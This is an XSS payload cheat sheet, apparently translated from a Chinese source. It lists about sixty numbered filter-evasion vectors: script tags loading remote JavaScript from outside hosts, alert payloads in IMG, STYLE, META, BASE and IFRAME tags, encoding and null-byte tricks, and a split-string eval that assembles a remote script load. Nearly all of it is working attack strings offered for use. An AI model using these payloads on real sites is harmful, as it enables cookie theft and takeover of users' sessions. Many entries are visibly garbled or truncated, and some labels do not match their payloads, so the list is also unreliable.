(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(99) Alternative ways to pop an alert
<q/oncut=alert()>1
<s/onclick=alert()>b1
<XSS=" onclick="alert(1)//">clickme</SSX=">
<zzz onclick=alert`1`>clickme</zzz>
<a onclick=alert`1`>clickme</a>
<a=">clickme</a=">
<a=">clickme</a>
<z=">clickme</z=">
<z onclick=alert`1`>clickme</z>

(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag, no semicolon, no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML entity encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-digit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=\'#\'" /span>

(11) Embedded tab, splitting up the JavaScript
<IMG SRC=\'#\'" ascript:alert('XSS');">

(12) Embedded encoded tab, splitting up the JavaScript
<IMG SRC=\'#\'" ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC=\'#\'" ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC=\'#\'" ascript:alert('XSS');">

(15) Multi-line embedded JavaScript injection, an extreme XSS example
<IMG SRC=\'#\'" /span>

(16) Working around character limits (must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null characters
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null characters 2 (null characters are basically ineffective in China, since there is nowhere to make use of them)
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the JavaScript in an IMG tag
<IMG SRC=\'#\'" javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(23) Extraneous open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC=\'#\'" /span>

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes, or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping JavaScript escapes
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) Input Image
<INPUT SRC=\'#\'" /span>

(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG Dynsrc
<IMG DYNSRC=\'#\'" /span>

(35) IMG Lowsrc
<IMG LOWSRC=\'#\'" /span>

(36) BGSOUND
<BGSOUND SRC=\'#\'" /span>

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote stylesheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBscript
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS

(41) META with a URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe
<IFRAME SRC=\'#\'" /IFRAME>

(43) Frame
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>

(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute using a split-up expression
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous HTML with a STYLE attribute (made of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE with expression
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag: you can embed a Flash movie that contains XSS
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf" ></EMBED>